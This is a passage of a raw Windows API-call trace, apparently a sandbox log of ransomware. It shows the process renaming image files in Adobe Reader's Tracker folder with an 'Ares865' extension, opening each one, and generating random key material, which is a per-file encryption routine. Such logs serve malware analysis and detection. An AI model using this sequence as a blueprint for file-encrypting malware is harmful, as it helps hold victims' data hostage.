[0169.462] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.463] lstrcpyW (in: lpString1=0x2cce470, lpString2="reviews_super.gif" | out: lpString1="reviews_super.gif") returned="reviews_super.gif" [0169.463] lstrlenW (lpString="reviews_super.gif") returned 17 [0169.463] lstrlenW (lpString="Ares865") returned 7 [0169.463] lstrcmpiW (lpString1="per.gif", lpString2="Ares865") returned 1 [0169.463] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_super.gif.Ares865") returned 81 [0169.463] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_super.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_super.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_super.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_super.gif.ares865"), dwFlags=0x1) returned 1 [0169.464] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\reviews_super.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\reviews_super.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.465] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=814) returned 1 [0169.465] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.466] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.466] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.468] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.468] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.469] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.469] lstrcpyW (in: lpString1=0x2cce470, lpString2="review_browser.gif" | out: lpString1="review_browser.gif") returned="review_browser.gif" [0169.469] lstrlenW (lpString="review_browser.gif") returned 18 [0169.469] lstrlenW (lpString="Ares865") returned 7 [0169.469] lstrcmpiW (lpString1="ser.gif", lpString2="Ares865") returned 1 [0169.469] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_browser.gif.Ares865") returned 82 [0169.469] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_browser.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_browser.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_browser.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_browser.gif.ares865"), dwFlags=0x1) returned 1 [0169.471] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_browser.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_browser.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.471] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1151) returned 1 [0169.471] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.472] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.472] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.474] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.475] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.475] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.475] lstrcpyW (in: lpString1=0x2cce470, lpString2="review_email.gif" | out: lpString1="review_email.gif") returned="review_email.gif" [0169.475] lstrlenW (lpString="review_email.gif") returned 16 [0169.476] lstrlenW (lpString="Ares865") returned 7 [0169.476] lstrcmpiW (lpString1="ail.gif", lpString2="Ares865") returned -1 [0169.476] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_email.gif.Ares865") returned 80 [0169.476] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_email.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_email.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_email.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_email.gif.ares865"), dwFlags=0x1) returned 1 [0169.477] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_email.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_email.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.477] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1405) returned 1 [0169.478] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.478] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.478] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.481] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.481] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.481] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.482] lstrcpyW (in: lpString1=0x2cce470, lpString2="review_same_reviewers.gif" | out: lpString1="review_same_reviewers.gif") returned="review_same_reviewers.gif" [0169.482] lstrlenW (lpString="review_same_reviewers.gif") returned 25 [0169.482] lstrlenW (lpString="Ares865") returned 7 [0169.482] lstrcmpiW (lpString1="ers.gif", lpString2="Ares865") returned 1 [0169.482] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_same_reviewers.gif.Ares865") returned 89 [0169.482] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_same_reviewers.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_same_reviewers.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_same_reviewers.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_same_reviewers.gif.ares865"), dwFlags=0x1) returned 1 [0169.484] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_same_reviewers.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_same_reviewers.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.484] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=962) returned 1 [0169.484] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.485] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.485] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.487] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.488] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.488] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.489] lstrcpyW (in: lpString1=0x2cce470, lpString2="review_shared.gif" | out: lpString1="review_shared.gif") returned="review_shared.gif" [0169.489] lstrlenW (lpString="review_shared.gif") returned 17 [0169.489] lstrlenW (lpString="Ares865") returned 7 [0169.489] lstrcmpiW (lpString1="red.gif", lpString2="Ares865") returned 1 [0169.489] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_shared.gif.Ares865") returned 81 [0169.489] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_shared.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_shared.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_shared.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_shared.gif.ares865"), dwFlags=0x1) returned 1 [0169.490] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_shared.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_shared.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.491] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1365) returned 1 [0169.491] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.491] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.491] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.496] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.497] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.497] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.498] lstrcpyW (in: lpString1=0x2cce470, lpString2="rss.gif" | out: lpString1="rss.gif") returned="rss.gif" [0169.498] lstrlenW (lpString="rss.gif") returned 7 [0169.498] lstrlenW (lpString="Ares865") returned 7 [0169.498] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\rss.gif.Ares865") returned 71 [0169.498] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\rss.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\rss.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\rss.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\rss.gif.ares865"), dwFlags=0x1) returned 1 [0169.499] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\rss.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\rss.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.500] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=222) returned 1 [0169.500] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.501] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.501] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.503] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.504] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.504] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.505] lstrcpyW (in: lpString1=0x2cce470, lpString2="server_issue.gif" | out: lpString1="server_issue.gif") returned="server_issue.gif" [0169.505] lstrlenW (lpString="server_issue.gif") returned 16 [0169.505] lstrlenW (lpString="Ares865") returned 7 [0169.505] lstrcmpiW (lpString1="sue.gif", lpString2="Ares865") returned 1 [0169.505] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_issue.gif.Ares865") returned 80 [0169.505] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_issue.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_issue.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_issue.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_issue.gif.ares865"), dwFlags=0x1) returned 1 [0169.506] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_issue.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_issue.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.507] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=576) returned 1 [0169.507] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.508] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.508] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.510] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.511] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.511] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.511] lstrcpyW (in: lpString1=0x2cce470, lpString2="server_lg.gif" | out: lpString1="server_lg.gif") returned="server_lg.gif" [0169.511] lstrlenW (lpString="server_lg.gif") returned 13 [0169.511] lstrlenW (lpString="Ares865") returned 7 [0169.512] lstrcmpiW (lpString1="_lg.gif", lpString2="Ares865") returned -1 [0169.512] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_lg.gif.Ares865") returned 77 [0169.512] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_lg.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_lg.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_lg.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_lg.gif.ares865"), dwFlags=0x1) returned 1 [0169.513] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_lg.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_lg.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.513] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1255) returned 1 [0169.514] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.514] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.514] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.517] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.517] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.517] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.518] lstrcpyW (in: lpString1=0x2cce470, lpString2="server_ok.gif" | out: lpString1="server_ok.gif") returned="server_ok.gif" [0169.518] lstrlenW (lpString="server_ok.gif") returned 13 [0169.518] lstrlenW (lpString="Ares865") returned 7 [0169.518] lstrcmpiW (lpString1="_ok.gif", lpString2="Ares865") returned -1 [0169.518] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_ok.gif.Ares865") returned 77 [0169.518] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_ok.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_ok.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_ok.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_ok.gif.ares865"), dwFlags=0x1) returned 1 [0169.537] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\server_ok.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\server_ok.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.537] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=225) returned 1 [0169.538] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.538] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.538] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.543] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.544] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.544] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.545] lstrcpyW (in: lpString1=0x2cce470, lpString2="stop_collection_data.gif" | out: lpString1="stop_collection_data.gif") returned="stop_collection_data.gif" [0169.545] lstrlenW (lpString="stop_collection_data.gif") returned 24 [0169.545] lstrlenW (lpString="Ares865") returned 7 [0169.545] lstrcmpiW (lpString1="ata.gif", lpString2="Ares865") returned 1 [0169.545] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\stop_collection_data.gif.Ares865") returned 88 [0169.545] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\stop_collection_data.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\stop_collection_data.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\stop_collection_data.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\stop_collection_data.gif.ares865"), dwFlags=0x1) returned 1 [0169.547] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\stop_collection_data.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\stop_collection_data.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.547] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=915) returned 1 [0169.547] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.548] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.548] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.558] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.559] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.559] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.560] lstrcpyW (in: lpString1=0x2cce470, lpString2="submission_history.gif" | out: lpString1="submission_history.gif") returned="submission_history.gif" [0169.560] lstrlenW (lpString="submission_history.gif") returned 22 [0169.560] lstrlenW (lpString="Ares865") returned 7 [0169.560] lstrcmpiW (lpString1="ory.gif", lpString2="Ares865") returned 1 [0169.560] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\submission_history.gif.Ares865") returned 86 [0169.560] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\submission_history.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\submission_history.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\submission_history.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\submission_history.gif.ares865"), dwFlags=0x1) returned 1 [0169.562] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\submission_history.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\submission_history.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.562] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=906) returned 1 [0169.562] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.563] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.563] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.569] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.570] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.570] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.570] lstrcpyW (in: lpString1=0x2cce470, lpString2="tl.gif" | out: lpString1="tl.gif") returned="tl.gif" [0169.570] lstrlenW (lpString="tl.gif") returned 6 [0169.570] lstrlenW (lpString="Ares865") returned 7 [0169.571] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\tl.gif.Ares865") returned 70 [0169.571] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\tl.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\tl.gif"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\tl.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\tl.gif.ares865"), dwFlags=0x1) returned 1 [0169.574] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\tl.gif.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\tl.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0169.574] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=85) returned 1 [0169.575] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0169.575] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0169.575] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.583] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0169.584] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0169.585] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0169.585] lstrcpyW (in: lpString1=0x2cce470, lpString2="tr.gif" | out: lpString1="tr.gif") returned="tr.gif" [0169.585] lstrlenW (lpString="tr.gif") returned 6 [0169.585] lstrlenW (lpString="Ares865") returned 7 [0169.585] wsprintfW (in: param_1=0x2ccd198, 